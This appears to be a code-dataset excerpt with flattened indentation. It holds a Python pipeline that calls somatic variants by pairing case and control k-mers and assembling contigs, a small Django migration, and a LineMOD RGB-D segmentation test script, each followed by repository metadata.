for i in reads:
if contig in i:return ('NA')
else:
out.write('>%s\n'%i)
out.write(i+'\n')
out.close()
subprocess.call("cap3 %s -x %s > /dev/null"%(fa.name,randseed),shell=True)
if os.path.exists('%s.%s.contigs'%(fa.name,randseed)):infered_contigs_nb=int(os.popen("grep Contig %s.%s.contigs|wc -l"%(fa.name,randseed)).readline().strip())
else:
print (contig,reads,' failed to infer ref')
infered_contigs_nb=0
if infered_contigs_nb==0:return('')
putative_ref = {}
for line in open(r'%s.%s.contigs'%(fa.name,randseed)):
if line.startswith('>'):
key = line.split(' ')[0]
putative_ref[key] = ''
else:
putative_ref[key]+=line.strip()
ref_qual = {}
for line in open(r'%s.%s.contigs.qual'%(fa.name,randseed)):
if line.startswith('>'):
key = line.split(' ')[0]
ref_qual[key] = []
else:
ref_qual[key]+=line.split()
ref=[]
bestref,bestscore='',0
for k,v in ref_qual.items():
score=np.mean(np.array(ref_qual[k]).astype(int))
if score>bestscore:
bestscore=score
bestref=putative_ref[k]
if score>50:ref.append(putative_ref[k])
if len(ref)==0:#use the putative ref with largest score
ref=[bestref]
os.system('rm %s.%s*'%(fa.name,randseed))
if len(ref)==1:putative_ref=(ref[0])
elif len(ref)>=2:
putative_ref=bestref
plus,minus=maxoverlap(contig,putative_ref)[2],maxoverlap(str(Seq(contig).reverse_complement()),putative_ref)[2]
if plus>minus:return putative_ref
else:return str(Seq(putative_ref).reverse_complement())
def nestDict(set1,set2):
idx=defaultdict(list)
keys_h,keys_t=[],[]
for q in set1:
keys_h.append(q[:min(int(len(q)/2),60)])
keys_t.append(q[max(-60,-int(len(q)/2)):])
for p in set2:
for k in keys_h:
if len(idx[k])>50:continue
if k in p:
idx[k].append(p[max(0,p.index(k)-15):p.index(k)+len(k)*2+15])
break
for k in keys_t:
if len(idx[k])>50:continue
for k in p:
idx[k].append(p[max(p.index(k)-len(k),0):p.index(k)+len(k)+15])
return idx
def contig_read_hash(fi,cor_reads):
with open(fi)as f:
contigs=list(map(lambda x:x.strip(),f))
contig_reads=defaultdict(list)
with open(cor_reads) as f:
while True:
line=f.readline()
if not line:break
if line.startswith('>')is False:continue
seq=f.readline().strip()
querys=re.findall('([ATCG]+)=',line)
if len(querys)==0:continue
for query in querys:
if len(contig_reads[query])>10:
continue
query=query.split('=')[0]#useless
if query not in contigs:continue
seq_s1,query_s1,len_overlap1=maxoverlap(seq,query)
seqrv=str(Seq(seq).reverse_complement())
seq_s2,query_s2,len_overlap2=maxoverlap(seqrv,query)
if len_overlap1>len_overlap2:seq,seq_s,query_s,len_overlap=seq,seq_s1,query_s1,len_overlap1
else:seq,seq_s,query_s,len_overlap=seqrv,seq_s2,query_s2,len_overlap2
if len_overlap<15:continue
contig_reads[query].append(seq[max(0,seq_s-query_s-30):min(len(seq),seq_s+len(query)-query_s+30)])
return (contig_reads)
def infer_ref(line):
contig=line[0]
kmers=contig2kmer(contig)
sp_case,cov_case,sp_control,cov_control,refpairs=contig_sp_cov.loc[contig].tolist()
refpairs=refpairs.split(',')
if len(refpairs)==1:return (refpairs[0],sp_case,cov_case,sp_control,cov_control)
try:
refseq=Assembly([Dseqrecord(i) for i in refpairs],limit=15).assemble_linear(max_nodes=3)[0].seq.watson
if maxoverlap(contig,refseq)[2]<15:refseq=assemDNA(refpairs)#for sake of low complexity sequences
except:refseq=assemDNA(refpairs)
if maxoverlap(contig,refseq)[2]<15:refseq=str(Seq(refseq).reverse_complement())
return (refseq,sp_case,cov_case,sp_control,cov_control)
def infer_ref_unpair(line,unpair_reads_dict):
contig,refseq=line[0],''
kmers=contig2kmer(contig)
sp_case,cov_case,sp_control,cov_control,refpairs=contig_sp_cov.loc[contig].tolist()
refpairs=refpairs.split(',')
related_reads=unpair_reads_dict[contig]
refseq='NA'
if len(refpairs)>2:#indels should have no more than 2 paired refs.(head and tail)
try:
refseq=Assembly([Dseqrecord(i) for i in refpairs],limit=15).assemble_linear(max_nodes=3)[0].seq.watson
except:refseq=assemDNA(refpairs)
if len(related_reads)>lowdepth/2 and len(refseq)<len(contig):refseq=CAP(contig,related_reads)
if maxoverlap(contig,refseq)[2]<15:refseq=str(Seq(refseq).reverse_complement())
return (refseq,sp_case,cov_case,sp_control,cov_control)
def ana_contigs(fi,paired=True):
if fi.split('/')[-1].startswith('x00'):contigs=pd.read_csv(fi,header=0,index_col=None,sep='\t')
else:contigs=pd.read_csv(fi,header=None,index_col=None,sep='\t')
contigs.columns=['contig']
if paired==False:unpair_reads_dict=contig_read_hash(fi,cor_reads)
a,b,c,d,e=[],[],[],[],[]
for i in trange(contigs.shape[0]):
if paired==False:aa,bb,cc,dd,ee=infer_ref_unpair(contigs.loc[i],unpair_reads_dict)
else:aa,bb,cc,dd,ee=infer_ref(contigs.loc[i])
a.append(aa)
b.append(bb)
c.append(cc)
d.append(dd)
e.append(ee)
contigs['putative_ref'],contigs['sp_case'],contigs['cov_case'],contigs['sp_control'],contigs['cov_control']=a,b,c,d,e#zip(*contigs.apply(infer_ref_unpair,1,args=(unpair_reads_dict,)))
if paired==False:contigs.to_csv('%s/contig_unpair/result%s.csv'%(outdir,fi.split('/')[-1]),header=False,index=False,sep='\t')
else:contigs.to_csv('%s/contig_pair/result%s.csv'%(outdir,fi.split('/')[-1]),header=False,index=False,sep='\t')
def filter_unpaired_contigs(fi):
#fileter low depth contig_unpaired
seed=NamedTemporaryFile(delete=True).name.split('/')[-1]
out=open('%s/contig_unpair/passedcontig_%s.fa'%(outdir,seed),'w')
out2=open('%s/contig_unpair/contigs_unpaired_%s'%(outdir,seed),'w')
weird_contig=open('%s/contig_unpair/FailedToInferRef_%s.txt'%(outdir,seed),'w')
mutkmerpool=kmerpair.index.tolist()
contig_unpair=pd.read_csv(fi,header=None,index_col=None,sep='\t')
if contig_unpair.shape[1]==4:contig_unpair.columns=['nb_kmer','contig','tag','Pvalue']
elif contig_unpair.shape[1]==1:contig_unpair.columns=['contig']
for contig in tqdm(contig_unpair.contig.tolist()):
headtailkmers=[contig[:31],contig[-31:]]
refkmers=kmerpair.reindex(headtailkmers)[1].dropna().tolist()
if len(refkmers)<2:
weird_contig.write(contig+'\n')
continue
out.write('>%s\n%s\n'%(contig,contig))
out2.write(contig+'\n')
out2.close()
out.close()
weird_contig.close()
def usedkmers(fi):
tag=fi.split('/')[-1].strip('.txt.gz')
subprocess.call(r"""less %s/contig_pair/usedkmers|awk '{print ">contig_"NR"\n"$1}' > %s/contig_pair/usedkmers_%s.fa"""%(outdir,outdir,tag),shell=True)
subprocess.call(r"""jellyfish query -s %s/contig_pair/usedkmers_%s.fa %s -o %s/contig_pair/usedkmers_%s"""%(outdir,tag,fi.replace('.txt.gz','.jf'),outdir,tag),shell=True,executable='/bin/bash')
kmers=pd.read_csv('%s/contig_pair/usedkmers_%s'%(outdir,fi.split('/')[-1].replace('.txt.gz','')),header=None,index_col=None,sep=' ')
kmers_rv=pd.DataFrame({0:[str(Seq(i).reverse_complement()) for i in kmers[0]],1:kmers[1]})
kmers=pd.concat([kmers,kmers_rv]).drop_duplicates()
kmers.index=kmers[0]
del kmers[0]
kmers.to_csv('%s/contig_pair/usedkmers_%s'%(outdir,fi.split('/')[-1].replace('.txt.gz','')),header=False,index=True,sep=' ')
def OnlyKeepMaxRef():
kmerpair=pd.read_csv('%s/contig_pair/kmerpair.csv'%outdir,header=None,index_col=None,sep='\t')
kmerpair.columns=['mut','wild']
wildkmercount=pd.read_csv('%s/contig_pair/usedkmers_%s'%(outdir,kmerfile_N.split('/')[-1].replace('.txt.gz','')),header=None,index_col=None,sep=' ')
wildkmercount.columns=['wild','count']
kmerpair_wildcount=pd.merge(kmerpair,wildkmercount,left_on='wild',right_on='wild',how='left')
kmerpair_wildcount=kmerpair_wildcount.sort_values('count',ascending=False).groupby('mut').first()
kmerpair_wildcount.to_csv('%s/contig_pair/kmerpair.csv'%outdir,header=False,index=True,sep='\t')
def shrink():
contigs=pd.read_csv('%s/merged_contigs/contigs_allspkmers'%outdir,header=0,index_col=None,sep='\t')
length=contigs.contig.apply(lambda x:len(x),1)
contigs=contigs[(length>=31+nb_kmers) & (length<100)]
contigs.to_csv('%s/merged_contigs/contigs_allspkmers'%outdir,header=True,index=False,sep='\t')
def comm(param):
threads,kmerfile_T,kmerfile_N,wild1,wild2,lowdepth,cutoff,support,nb_kmers,distance=sys.argv[1:]
threads,lowdepth,cutoff,support,nb_kmers,distance=int(threads),int(lowdepth),float(cutoff),int(support),int(nb_kmers),int(distance)
samid=kmerfile_T.split('/')[-1].replace('.txt.gz','')
outdir=os.path.dirname(os.path.dirname(kmerfile_T))
if param=='12':
subprocess.call(r'''comm -12 <(%s %s|awk '{if($2>%s){print $1}}') <(%s %s |awk '{if($2>%s){print $1}}') > %s/case_specific_kmers/shared_kmers'''%(compress,kmerfile_T,support,compress,kmerfile_N,support,outdir),shell=True,executable='/bin/bash')
elif param=='23':
subprocess.call(r'''comm -23 <(%s %s|awk '{if($2>%s){print $1}}') <(%s %s |awk '{if($2>0){print $1}}') > %s/case_specific_kmers/specific_kmer'''%(compress,kmerfile_T,support,compress,kmerfile_N,outdir),shell=True,executable='/bin/bash')
elif param=='homo':
subprocess.call(r'''%s %s|awk '{if($2>%s){print $1}}' > %s/case_specific_kmers/shared_kmers'''%(compress,kmerfile_N,lowdepth,outdir),shell=True,executable='/bin/bash')#adaptable to homo variant
def Cal_sp_cov(contigs):
col1,col2=[],[]
for contig in contigs:
kmers=contig2kmer(contig)
col1+=[contig]*len(kmers)
col2+=kmers
df=pd.DataFrame({'contig':col1,'kmers':col2})
df['refs']=kmerpair.reindex(df.kmers)[1].tolist()
df['sp_T']=mutkmers.reindex(df.kmers)[1].tolist()
df['allel2_T']=mutkmers.reindex(df.refs)[1].tolist()
df['sp_N']=wildkmers.reindex(df.kmers)[1].tolist()
df['allel2_N']=wildkmers.reindex(df.refs)[1].tolist()
rawdf=df.dropna().copy()
df=df.groupby('contig').median()
df['cov_T']=df.sp_T+df.allel2_T
df['cov_N']=df.sp_N+df.allel2_N
df=df[['sp_T','cov_T','sp_N','cov_N']].dropna().astype(int)
df=df[(df.sp_T>=support)&(df.cov_T>=lowdepth)]
df['refpairs']=rawdf.groupby('contig')['refs'].apply(lambda x:','.join(x))
df_rv=df.copy()
df_rv.index=[str(Seq(i).reverse_complement()) for i in df.index]
df=pd.concat([df,df_rv])
df=df.loc[~df.index.duplicated(keep='first')]
return df
def RemoveFP_via_control(contigs):
ext_kmers=defaultdict(list)
for contig in contigs:
if len(contig)>60:continue
for c in 'ATCG':
ext_kmers[contig].append(c+contig[:30])
ext_kmers[contig].append(contig[-30:]+c)
fa=NamedTemporaryFile(delete=False)
ext_kmers_count=NamedTemporaryFile(delete=False)
out=open(fa.name+'.fa','w')
for i_ in ext_kmers.values():
for i in i_:
out.write('>%s\n'%i)
out.write(i+'\n')
out.close()
subprocess.call(r"""jellyfish query -s %s.fa %s/case_specific_kmers/%s -o %s/variant_result/ext_kmers_count"""%(fa.name,outdir,kmerfile_N.split('/')[-1].replace('.txt.gz','.jf'),outdir),shell=True,executable='/bin/bash')
if __name__ == '__main__':
threads,kmerfile_T,kmerfile_N,wild1,wild2,lowdepth,cutoff,support,nb_kmers,distance=sys.argv[1:]
threads,lowdepth,cutoff,support,nb_kmers,distance=int(threads),int(lowdepth),float(cutoff),int(support),int(nb_kmers),int(distance)
samid=kmerfile_T.split('/')[-1].replace('.txt.gz','')
outdir=os.path.dirname(os.path.dirname(kmerfile_T))
os.system('cd ../mergeTags;make')
os.system('mv ../mergeTags/mergeTags ./')
################# extract case specific kmers #######################
nb_kmers_eachthread=10000000
fpath='%s/case_specific_kmers/shared_kmers_count'%outdir
if os.path.exists('%s/variant_result/SNV_alignments.vcf'%outdir) is False:
print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'extract specific kmers')
pool=Pool(2)
pool.map(comm,['23','homo'])# homo mode for calling homozygote and 12 mode for somatic
pool.close()
pool.join()
if int(os.popen('wc -l %s/case_specific_kmers/specific_kmer'%outdir).readline().strip().split()[0])>50000000:os._exit(0)
os.system("echo 'tag\tpvalue' > %s/case_specific_kmers/specific_kmer_fix"%outdir)
print("./mergeTags -k 31 -m 25 -n %s/case_specific_kmers/specific_kmer_fix 2>/dev/null|awk '{if($1>%s){print $0}}'|gzip -c > %s/merged_contigs/contigs.gz;gunzip -c %s/merged_contigs/contigs.gz > %s/merged_contigs/contigs_allspkmers"%(outdir,nb_kmers,outdir,outdir,outdir))
subprocess.call(r"""awk '{print $1"\t0"}' %s/case_specific_kmers/specific_kmer >> %s/case_specific_kmers/specific_kmer_fix"""%(outdir,outdir),shell=True)
subprocess.call(r"./mergeTags -k 31 -m 25 -n %s/case_specific_kmers/specific_kmer_fix 2>/dev/null|awk '{if($1>%s){print $0}}'|gzip -c > %s/merged_contigs/contigs.gz;gunzip -c %s/merged_contigs/contigs.gz > %s/merged_contigs/contigs_allspkmers"%(outdir,nb_kmers,outdir,outdir,outdir),shell=True)
subprocess.call(r"""less %s/case_specific_kmers/shared_kmers|awk '{print ">kmer"NR"\n"$1}' > %s/case_specific_kmers/shared_kmers.fa"""%(outdir,outdir),shell=True)
subprocess.call(r"""jellyfish query -s %s/case_specific_kmers/shared_kmers.fa %s/case_specific_kmers/%s -o %s/case_specific_kmers/shared_kmers_count"""%(outdir,outdir,kmerfile_N.split('/')[-1].replace('.txt.gz','.jf'),outdir),shell=True)
#shrink the contigs_allspkmers and remove useless kmers from the specific_kmer_fix
if os.path.exists('%s/contig_pair/contigs_pairedspkmers'%outdir) is False:
shrink()
if platform.system()=='Linux':
os.system("""rm %s/x*_N;split -l %s -d --additional-suffix=%s_N %s/case_specific_kmers/shared_kmers_count;mv x*%s_N %s"""%(outdir,min(10000000,nb_kmers_eachthread),samid,outdir,samid,outdir))
else:
os.system("""rm %s/x*_N;split -l %s %s/case_specific_kmers/shared_kmers_count"""%(outdir,min(10000000,nb_kmers_eachthread),outdir))
for xf in os.popen('ls ./x*').readlines():
os.system("mv %s %s"%(xf.strip(),outdir+'/'+xf.strip()+samid+'_N'))
fileidxs=[i.strip() for i in os.popen('ls %s/x*%s_N'%(outdir,samid)).readlines()]
print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'indexing and pairing kmers')
with open('%s/case_specific_kmers/specific_kmer_fix'%outdir)as f:
spekmer=list(map(lambda x:x.strip().split()[0],f))[1:]#the 1st line is tag\tpvalue
spekmer=spekmer+[str(Seq(i).reverse_complement()) for i in spekmer]#add revcomp to the specific kmer list, in case kmerpair misses true pairs.remove and test
with Manager() as manager:
################# pairing kmers from case and control #####################
lock=manager.Lock()
global pair_T,pair_N
pair_T=manager.list()
pair_N=manager.list()
ncores=min(threads,len(fileidxs))
pool=Pool(ncores)
singlethread = partial(createindex, lock)
pool.map(singlethread, fileidxs)
pool.close()
pool.join()
'''
print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'adding mut kmers into the hash')#what's the purpose of this part?
idx_head,idx_tail=defaultdict(lambda: defaultdict(list)),defaultdict(lambda: defaultdict(list))
for q in spekmer:
idx_head[q[:15]]['mut'].append(q)
idx_tail[q[-15:]]['mut'].append(q)
subpair_T,subpair_N=pairkmers(idx_head,idx_tail)
pair_T+=subpair_T
pair_N+=subpair_N
print (len(subpair_T))
'''
np.savetxt('%s/contig_pair/pair.txt'%outdir, np.stack([pair_T,pair_N]).T,delimiter="\t",fmt="%s")
out=open('%s/contig_pair/kmer_T'%outdir,'w')
kmerpair=pd.read_csv('%s/contig_pair/pair.txt'%outdir,header=None,index_col=None,sep='\t')
pair_T_rv=[str(Seq(i).reverse_complement()) for i in pair_T]
for p in set(pair_T).difference(set(pair_T_rv)):out.write(p+'\n')
out.close()
kmerpair_rv=pd.DataFrame({0:[str(Seq(i).reverse_complement()) for i in kmerpair[0]],1:[str(Seq(i).reverse_complement()) for i in kmerpair[1]]})
kmerpair=pd.concat([kmerpair,kmerpair_rv]).drop_duplicates()
kmerpair.index=kmerpair[0]
del kmerpair[0]
kmerpair.to_csv('%s/contig_pair/kmerpair.csv'%outdir,header=False,index=True,sep='\t')
print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'shrink useful kmers from kmerpair')
out=open('%s/contig_pair/usedkmers'%outdir,'w')
for i in set(list(pair_T)+list(pair_N)):
out.write(i+'\n')
out.close()
pool=Pool(2)
pool.map(usedkmers, [kmerfile_T,kmerfile_N])
pool.close()
pool.join()
OnlyKeepMaxRef()
del pair_T_rv,spekmer,kmerpair_rv
wildkmers=pd.read_csv('%s/contig_pair/usedkmers_%s'%(outdir,kmerfile_N.split('/')[-1].replace('.txt.gz','')),header=None,index_col=0,sep=' ')
mutkmers=pd.read_csv('%s/contig_pair/usedkmers_%s'%(outdir,kmerfile_T.split('/')[-1].replace('.txt.gz','')),header=None,index_col=0,sep=' ')
contig_all=pd.read_csv('%s/merged_contigs/contigs_allspkmers'%outdir,header=0,index_col=None,sep='\t')
kmerpair=pd.read_csv('%s/contig_pair/kmerpair.csv'%outdir,header=None,index_col=0,sep='\t')
contig_sp_cov=Cal_sp_cov(contig_all.contig)
del wildkmers,mutkmers
if os.path.exists('%s/contig_pair/contigs_pairedspkmers'%outdir) is False:
print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'merging into paired contigs')
os.system("echo 'tag\tpvalue' > %s/contig_pair/specific_kmer_fix"%outdir)
subprocess.call(r"""awk '{print $1"\t0"}' %s/contig_pair/kmer_T >> %s/contig_pair/specific_kmer_fix"""%(outdir,outdir),shell=True)
subprocess.call(r"./mergeTags -k 31 -m 25 -n %s/contig_pair/specific_kmer_fix 2>/dev/null|awk '{if($1>%s){print $0}}'|gzip -c > %s/contig_pair/contigs.gz;gunzip -c %s/contig_pair/contigs.gz |cut -f 2 > %s/contig_pair/contigs_pairedspkmers"%(outdir,nb_kmers,outdir,outdir,outdir),shell=True)
contig_all=contig_all[contig_all.contig.isin(contig_sp_cov.index)]
contig_pair=pd.read_csv('%s/contig_pair/contigs_pairedspkmers'%outdir,header=0,index_col=None,sep='\t')
contig_pair=contig_pair[contig_pair.contig.isin(contig_sp_cov.index)]
contig_pair_plus_rv=contig_pair.contig.tolist()+[str(Seq(i).reverse_complement()) for i in contig_pair.contig.tolist()]
pairidx=contig_all.contig.isin(contig_pair_plus_rv)#leave too many unpaired contigs to bbduk step
contig_pair=contig_all[pairidx]
contig_pair.contig.to_csv('%s/contig_pair/contigs_pairedspkmers'%outdir,header=True,index=False,sep='\t')
contig_unpair=contig_all[-pairidx]
print ('orignial contigs: %s;paired contigs: %s; unpaired contigs: %s'%(contig_all.shape[0],contig_pair.shape[0],contig_unpair.shape[0]))
for name, size in sorted(((name, sys.getsizeof(value)) for name, value in locals().items()),key= lambda x: -x[1])[:10]:
if size > 100000:print("{:>30}: {:>8}".format(name, sizeof_fmt(size)))
################## call variants from paired contigs #######################
nb_contigs_eachthread=ceil(contig_pair.shape[0]/threads)
if nb_contigs_eachthread>0 and os.path.exists('%s/variant_result/SNV_results_pair.txt'%outdir) is False:
print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'all threads for %s contig_paired are started'%contig_pair.shape[0])
subprocess.call("""rm %s/x*;split -l %s -d --additional-suffix=pair_%s %s/contig_pair/contigs_pairedspkmers;mv x*pair_%s %s"""%(outdir,nb_contigs_eachthread,samid,outdir,samid,outdir),shell=True,executable='/bin/bash')
fileidxs=[i.strip() for i in os.popen('ls %s/x*pair_%s|grep -v unpair'%(outdir,samid)).readlines()]
print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'%s chunks are undergoing analysis'%len(fileidxs))
pool=Pool(min(len(fileidxs),threads))
pool.starmap(ana_contigs, zip(fileidxs,[True]*len(fileidxs)))
pool.close()
pool.join()
subprocess.call(r'''cat %s/contig_pair/result* > %s/variant_result/SNV_results_pair.txt;rm %s/contig_pair/result*'''%(outdir,outdir,outdir),shell=True)
print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'all threads for contig_paired are finished')
################## call variants from unpaired contigs ########################
try: nb_unpair=contig_unpair.shape[0]
except: nb_unpair=0
if nb_unpair>0 and os.path.exists('%s/variant_result/SNV_results_unpair.txt'%outdir) is False:
contig_unpair.to_csv('%s/contig_unpair/contigs_unpaired.pass'%outdir,header=False,index=False,sep='\t')
print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'all threads for %s contig_unpaired are started'%(contig_unpair.shape[0]))
nb_contigs_eachthread=ceil(int(os.popen('wc -l %s/contig_unpair/contigs_unpaired.pass'%outdir).readline().strip().split()[0])/threads)
subprocess.call("""rm x*passed_%s;split -l %s -d --additional-suffix=passed_%s %s/contig_unpair/contigs_unpaired.pass;mv x*passed_%s %s"""%(samid,nb_contigs_eachthread,samid,outdir,samid,outdir),shell=True,executable='/bin/bash')
fileidxs=[i.strip() for i in os.popen('ls %s/x*passed_%s'%(outdir,samid)).readlines()]
print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'%s chunks of contig_unpaired undergo filtering'%len(fileidxs))
pool=Pool(min(len(fileidxs),threads))
pool.map(filter_unpaired_contigs, fileidxs)
pool.close()
pool.join()
os.system("cat %s/contig_unpair/passedcontig_* > %s/contig_unpair/passedcontig.fa;echo 'contig' > %s/contig_unpair/contigs_unpaired;cat %s/contig_unpair/contigs_unpaired_* >> %s/contig_unpair/contigs_unpaired;cat %s/contig_unpair/FailedToInferRef_* > %s/contig_unpair/FailedToInferRef.txt"%(outdir,outdir,outdir,outdir,outdir,outdir,outdir))
if os.path.exists('%s/variant_result/SNV_results_unpair.txt'%outdir) is False:
nb_contigs_eachthread=ceil(int(os.popen('wc -l %s/contig_unpair/contigs_unpaired'%outdir).readline().strip().split()[0])/threads)
print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'%s/%s unpaired contigs are dumped to bbduk'%(int(os.popen('wc -l %s/contig_unpair/contigs_unpaired'%outdir).readline().strip().split()[0])-1,contig_unpair.shape[0]))
#retriev reads from fastq
os.system("bbduk.sh in=%s in2=%s ref=%s k=31 mm=f rcomp=t outm=%s fastawrap=500 rename=t hdist=%s speed=0 2>/dev/null"%(wild1,wild2,'%s/contig_unpair/passedcontig.fa'%outdir,'%s/contig_unpair/unpair_contigs_reads.fa'%outdir,distance))
cor_reads='%s/contig_unpair/unpair_contigs_reads.fa'%outdir
try:nb_weird_contig=int(os.popen('wc -l %s/contig_unpair/FailedToInferRef.txt'%outdir).readline().strip().split()[0])
except:nb_weird_contig=0
subprocess.call(r"""split -l %s -d --additional-suffix=unpair_%s %s/contig_unpair/contigs_unpaired;mv x*unpair_%s %s"""%(nb_contigs_eachthread,samid,outdir,samid,outdir),shell=True,executable='/bin/bash')
fileidxs=[i.strip() for i in os.popen('ls %s/x*unpair_%s'%(outdir,samid)).readlines()]
print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'%s chunks of contig_unpaired are started'%(len(fileidxs)))
pool=Pool(min(len(fileidxs),threads))
pool.starmap(ana_contigs, zip(fileidxs,[False]*len(fileidxs)))
pool.close()
pool.join()
subprocess.call(r'''cat %s/contig_unpair/result* > %s/variant_result/SNV_results_unpair.txt;rm %s/contig_unpair/result* %s/contig_unpair/unpair_contigs_reads.fa'''%(outdir,outdir,outdir,outdir),shell=True)
print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'all threads for contig_unpaired are finished')
##################### prepare final results ###################
print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'prepare the final result')
subprocess.call(r'''cat %s/variant_result/SNV_results_* > %s/variant_result/SNV_results.txt;rm %s/x* %s/contig_unpair/*_tmp*'''%(outdir,outdir,outdir,outdir),shell=True)
result=pd.read_csv('%s/variant_result/SNV_results.txt'%outdir,header=None,index_col=None,sep='\t')
result.columns=['contig','putative_ref','sp_case','cov_case','sp_control','cov_control']
result=result[(result.sp_case>=support)&(result.cov_case>=lowdepth)&(result.cov_control>=lowdepth)&((result.sp_case>10)|(result.sp_case/result.cov_case>cutoff))&(-result.putative_ref.isna())].drop_duplicates()
result=result.sort_values(['sp_case'],ascending=False)
result.to_csv('%s/variant_result/SNV_report.txt'%outdir,header=True,index=False,sep='\t')
with open('%s/variant_result/SNV_report.txt'%outdir)as f:
snv=list(map(lambda x:x.strip().split(),f))
RemoveFP_via_control([i[0] for i in snv[1:]])
align=open('%s/variant_result/SNV_alignments.txt'%outdir,'w')
for line in tqdm(snv[1:]):
alignments=pairwise2.align.localms(line[0],line[1],5, -2.5, -8, -.4)
try:
#if len(alignments[0][0])<31:continue#the mutant contig is very different to the refseq and alignment failed
align.write(format_alignment(*alignments[0]).rstrip()+'\t'+str(line[-4])+'\t'+str(line[-3])+'\t'+str(line[-2])+'\t'+str(line[-1])+'\n')
except:
print (line,alignments,'align failed')
align.close()
| [
"noreply@github.com"
] | noreply@github.com |
159e62cf42f265a5d96156ae23363dbeced3b8c0 | 1e53216c58f3c7843031721305590b83dbaed3f2 | /week_four/db_demo/db_app/migrations/0003_message_post_user_who_liked.py | 59fc1606c04688bdf72a3cafe91a74cffc27e608 | [] | no_license | MTaylorfullStack/python_july_20 | 991852ba12d6f06d6b93b8efc60b66ee311b5cb3 | bdfb0d9a74300f2d6743ac2d108571692ca43ad9 | refs/heads/master | 2022-12-12T18:03:00.886048 | 2020-08-27T23:53:31 | 2020-08-27T23:53:31 | 277,956,745 | 2 | 2 | null | 2023-06-30T20:06:11 | 2020-07-08T01:09:34 | Python | UTF-8 | Python | false | false | 425 | py | # Generated by Django 2.2 on 2020-07-29 00:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('db_app', '0002_message_post'),
]
operations = [
migrations.AddField(
model_name='message_post',
name='user_who_liked',
field=models.ManyToManyField(related_name='liked_post', to='db_app.User'),
),
]
| [
"mtaylor@codingdojo.com"
] | mtaylor@codingdojo.com |
dd6d4db1190524c0a26a2fdc412d00bdd2e2dcf3 | 5e5e74ee44a90d2103b312fb75f47b62dcaebc2e | /code/segmentation/test_linemod_rgbd.py | cd26cc1bdb166319278c9af5facfd840dfa0a7be | [] | no_license | cmitash/multi-instance-pose-estimation | df98835f60208a5055cef035d6a998e332adc377 | 3fa26634d0c34419e93c52b91e121d4d410d64d1 | refs/heads/master | 2021-07-04T00:38:04.170108 | 2021-02-22T01:30:05 | 2021-02-22T01:30:05 | 217,936,365 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,185 | py | import os
from options.test_options import TestOptions
from data import CreateDataLoader
from models import create_model
from util.visualizer import save_images
from util import html
import numpy as np
import torchvision.transforms as transforms
from PIL import Image
import torch
import cv2
object_classes = {0: 'background', 1: 'obj_01', 2: 'obj_02', 3: 'obj_05',
4: 'obj_06', 5: 'obj_08', 6: 'obj_09', 7: 'obj_10',
8: 'obj_11', 9: 'obj_12'}
test_scenes = [3, 8, 17, 27, 36, 38, 39, 41, 47, 58, 61, 62, 64, 65, 69, 72, 79, 89, 96, 97, 102, 107, 110, 115, 119, 124, 126, 136, 153, 156, 162, 166, 175, 176, 178, 203, 207, 217, 219, 221, 224, 243, 248, 249, 254, 258, 263, 266, 268, 277, 283, 307, 310, 322, 326, 338, 342, 356, 362, 365, 368, 387, 389, 402, 415, 417, 425, 428, 434, 435, 438, 442, 446, 453, 473, 474, 476, 477, 480, 491, 494, 499, 501, 503, 521, 527, 529, 532, 535, 540, 543, 549, 560, 563, 571, 575, 589, 603, 607, 611, 615, 625, 642, 648, 649, 650, 652, 667, 669, 679, 691, 695, 703, 708, 711, 727, 736, 737, 739, 740, 750, 754, 756, 757, 758, 761, 762, 764, 768, 769, 770, 773, 775, 785, 788, 791, 794, 801, 803, 804, 808, 809, 819, 821, 828, 837, 840, 844, 850, 856, 867, 871, 877, 883, 886, 894, 902, 903, 904, 907, 909, 918, 925, 934, 942, 952, 956, 961, 968, 969, 972, 982, 984, 991, 1001, 1012, 1038, 1050, 1057, 1061, 1069, 1071, 1087, 1098, 1099, 1103, 1107, 1117, 1123, 1131, 1144, 1148, 1151, 1157, 1168, 1169, 1176, 1180, 1199, 1212]
test_path = 'datasets/occ_linemod/'
if __name__ == '__main__':
opt = TestOptions().parse()
opt.nThreads = 1 # test code only supports nThreads = 1
opt.batchSize = 1 # test code only supports batchSize = 1
opt.serial_batches = True # no shuffle
opt.no_flip = True # no flip
opt.display_id = -1 # no visdom display
model = create_model(opt)
model.setup(opt)
for testcase in test_scenes:
scene_folder = os.path.join(test_path, '%04d' % int(testcase))
test_rgb_image = os.path.join(scene_folder, 'rgb.png')
test_depth_image = os.path.join(scene_folder, 'depth.png')
A_img_depth = cv2.imread(test_depth_image, cv2.IMREAD_UNCHANGED)
A_img_depth = A_img_depth.astype(np.float32)
A_img_depth = A_img_depth/1000.0
A_img_depth[A_img_depth > 2] = 0
max_val = np.amax(A_img_depth[np.nonzero(A_img_depth)])
min_val = np.amin(A_img_depth[np.nonzero(A_img_depth)])
A_img_depth = (A_img_depth - min_val)*255.0/(max_val - min_val)
A_img_depth[A_img_depth < 0] = 0
A_img_depth = A_img_depth.astype(np.uint8)
A_img_depth = np.expand_dims(A_img_depth, axis=2)
A_img_rgb = Image.open(test_rgb_image).convert('RGB')
A_img_rgb = np.array(A_img_rgb, dtype=np.uint8)
A = np.concatenate((A_img_rgb, A_img_depth), axis=2)
A = transforms.ToTensor()(A)
A = transforms.Normalize((0.5, 0.5, 0.5, 0.5), (0.5, 0.5, 0.5, 0.5))(A)
A = A.unsqueeze(0)
data = {'A': A, 'A_paths': scene_folder, 'object_classes': object_classes}
model.set_input(data)
model.test()
print (test_rgb_image)
| [
"cmitash@Chaitanyas-MacBook-Pro.local"
